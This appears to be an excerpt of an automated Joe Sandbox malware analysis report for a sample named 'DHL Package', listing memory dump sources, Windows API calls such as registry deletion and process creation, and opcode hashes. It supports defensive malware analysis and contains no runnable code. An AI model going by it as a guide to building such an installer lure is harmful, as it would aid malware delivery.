                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                • String ID:
                                                                                                • API String ID: 1941528284-0
                                                                                                • Opcode ID: 9c63aff5655d4e14ed2bbeeccd25930624a363ceffe893c688c7483ad26c4c8d
                                                                                                • Instruction ID: 099db37703b38b7faa9c4b3761aa4ffcdc8a6de3d1088dc1ecc91c4b2867a8b7
                                                                                                • Opcode Fuzzy Hash: 9c63aff5655d4e14ed2bbeeccd25930624a363ceffe893c688c7483ad26c4c8d
                                                                                                • Instruction Fuzzy Hash: BB41C171500118BACB10BFA5DC85DAE7A79EF41328F20423FF822B10E1C77C8A519A6E
                                                                                                APIs
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                • String ID:
                                                                                                • API String ID: 1354259210-0
                                                                                                • Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                • Instruction ID: 0e68a9e52e1d6489b1d96d2929a27e43e5cdd4abb6d38d1bd7d6776dab24ddff
                                                                                                • Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                • Instruction Fuzzy Hash: 62215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11A0E7B48E54AAA8
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                                                • Instruction ID: 4c6ae9b1abf83e60acb3738700a7a9d8e0f5f354904a09afb896d410ef8a521a
                                                                                                • Opcode Fuzzy Hash: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                                                • Instruction Fuzzy Hash: CE212672A00119AFCB05CFA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                • String ID:
                                                                                                • API String ID: 3808545654-0
                                                                                                • Opcode ID: 383e59609db2bd9392710b838b48bfda8626baac977e96e1bde4cf408244bbd6
                                                                                                • Instruction ID: b60ccfaacb74251373a9760c042081773c0d6d705e51916df09e3ce9171beb14
                                                                                                • Opcode Fuzzy Hash: 383e59609db2bd9392710b838b48bfda8626baac977e96e1bde4cf408244bbd6
                                                                                                • Instruction Fuzzy Hash: 2701D871950650EFEB006BB4AE89BDA3FB0AF55301F10493AF141B71E2C6B90404DB3D
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                                                • Instruction ID: dd4700ba4ce2c01fdcac70281bc34cd4026078c78447772ebe71ed50cab348e7
                                                                                                • Opcode Fuzzy Hash: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                                                • Instruction Fuzzy Hash: 3C21AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                                                • wsprintfW.USER32 ref: 00404C88
                                                                                                • SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s
                                                                                                • API String ID: 3540041739-3551169577
                                                                                                • Opcode ID: d10727bfe45036c7ef4c0945d22c1597f07d9cc2f464814d913e74af0bd9f4be
                                                                                                • Instruction ID: 7c0a82a5d8c5e130c70e624adf1be80dcdc0ad06cf4f4d66f209f919317c7709
                                                                                                • Opcode Fuzzy Hash: d10727bfe45036c7ef4c0945d22c1597f07d9cc2f464814d913e74af0bd9f4be
                                                                                                • Instruction Fuzzy Hash: 9B11D5736041283BEB00666D9C45EDE3298DBC5334F264237FA26F61D1E978CC2286E8
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(?,?,00437800), ref: 00405955
                                                                                                • GetLastError.KERNEL32 ref: 00405969
                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040597E
                                                                                                • GetLastError.KERNEL32 ref: 00405988
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                • String ID:
                                                                                                • API String ID: 3449924974-0
                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                • Instruction ID: dda0a131242ff184f2ccb02743bd446f17612fd9a9d8f3d2581d745ec2ea809b
                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                • Instruction Fuzzy Hash: 010108B1C00219EADF009BA0C944BEFBBB4EB04364F00803AD945B6180D77996488FA9
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                                                • GetTickCount.KERNEL32 ref: 00402FE2
                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                                                • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                • String ID:
                                                                                                • API String ID: 2102729457-0
                                                                                                • Opcode ID: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                                                • Instruction ID: cb146776896af08e1a0fdef995d2a06b2a54ad4518ff1494983f568d8b9f1051
                                                                                                • Opcode Fuzzy Hash: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                                                • Instruction Fuzzy Hash: 52F05E31606621EBC6716F10FE0CA8B7BA5FB44B42B52487AF441B11E5D7B608829BAD
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 004053E6
                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405437
                                                                                                  • Part of subcall function 0040437D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                • String ID:
                                                                                                • API String ID: 3748168415-3916222277
                                                                                                • Opcode ID: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                                                • Instruction ID: da482bbf0ee2bc432bcdf1377e528ba943c285c76ef4d04d2afca056141c401e
                                                                                                • Opcode Fuzzy Hash: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                                                • Instruction Fuzzy Hash: 4E01B131200608ABDF314F11ED81B9B3629EB84752F608037FA01752D1C7798DD29E69
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00405F1E
                                                                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,0040348D,00437000,00437800,00437800,00437800,00437800,00437800,00437800,004036D9), ref: 00405F39
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: nsa
                                                                                                • API String ID: 1716503409-2209301699
                                                                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                • Instruction ID: 92234304539bf7ece852ec87847853e593a29ed380df2f8ac1d63cab01e19b90
                                                                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                • Instruction Fuzzy Hash: 9DF09076B00204BBEB00CF59ED09E9FB7ACEB95750F11803AEA44F7140E6B499548B68
                                                                                                APIs
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
                                                                                                • CloseHandle.KERNEL32(?), ref: 004059FA
                                                                                                Strings
                                                                                                • Error launching installer, xrefs: 004059D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: Error launching installer
                                                                                                • API String ID: 3712363035-66219284
                                                                                                • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                • Instruction ID: 20697c874bd4b9c747bb4d9041eb299060a3c9f0112610a55a8a246a05e7abf4
                                                                                                • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                • Instruction Fuzzy Hash: 7DE0BFB46002097FEB109B64ED45F7B77ACEB04708F414966BD50F6150DB7499158E7C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                                                • Instruction ID: 32e2ab4cb65e7230aeff806a84dbae4d22e6cbaaf638251473bf6dacb733d759
                                                                                                • Opcode Fuzzy Hash: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                                                • Instruction Fuzzy Hash: 29A13231E04229CBDF28CFA8C8546ADBBB1FF45305F14806ED856BB281D7786A86DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                                                • Instruction ID: e827159e3c0f30117cfd40fb8871c1536360b3329485a12100fd3651e411c43c
                                                                                                • Opcode Fuzzy Hash: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                                                • Instruction Fuzzy Hash: A4912230E04228CBDF28CFA8C854BADBBB1FB45305F14816ED852BB281C7786986DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
                                                                                                • Instruction ID: e886ca087a0a39174fbb15e481659c292d22b9db4249bf85fd90a7a13df170d2
                                                                                                • Opcode Fuzzy Hash: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
                                                                                                • Instruction Fuzzy Hash: 99813671E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB291C7785986DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                                                • Instruction ID: 102eaf4500afa36507883bc49c2e43cf6988b9622fad8f3b05d2dee193d28093
                                                                                                • Opcode Fuzzy Hash: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                                                • Instruction Fuzzy Hash: 59814631E04228DBEB24CFA8C8447ADBBB1FB45305F24816AD856BB2C1D7786986DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                                                • Instruction ID: a08c2ff1229a9d9811f570562685937cd52cd07e2c0e62d18be643d670bbfbbc
                                                                                                • Opcode Fuzzy Hash: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                                                • Instruction Fuzzy Hash: B2712471E04228CFDF24CFA8C894BADBBB1FB45305F14806AD846BB281D7386996DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                                                • Instruction ID: 79a44bce1fc769ef2bff189c36481e04bceb851a7a33cd9c662bfef797063258
                                                                                                • Opcode Fuzzy Hash: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                                                • Instruction Fuzzy Hash: 16713571E04218CFDF28CFA8C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                                                • Instruction ID: e69ca442741bc9d68f02c0d51ce09155c0cc214200520a71f8620544c8c92ec3
                                                                                                • Opcode Fuzzy Hash: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                                                • Instruction Fuzzy Hash: 78713731E04229CFEF24CF98C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: F$F$F$F
                                                                                                • API String ID: 0-1844600021
                                                                                                • Opcode ID: ba32fa2ca0e9931f3434cf64946129d1aa74178445d166b95a0b8483b47bebfc
                                                                                                • Instruction ID: 5f35c7d98d7a3aa79bc1d937fb7fb63d328035a0b5efebeb86782b0997959854
                                                                                                • Opcode Fuzzy Hash: ba32fa2ca0e9931f3434cf64946129d1aa74178445d166b95a0b8483b47bebfc
                                                                                                • Instruction Fuzzy Hash: 08319E34A093449FDB06EBB8C45179EBFB1EF86309F1080EAD4509B296DB395909CB92
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E5E
                                                                                                • CharNextA.USER32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E6F
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
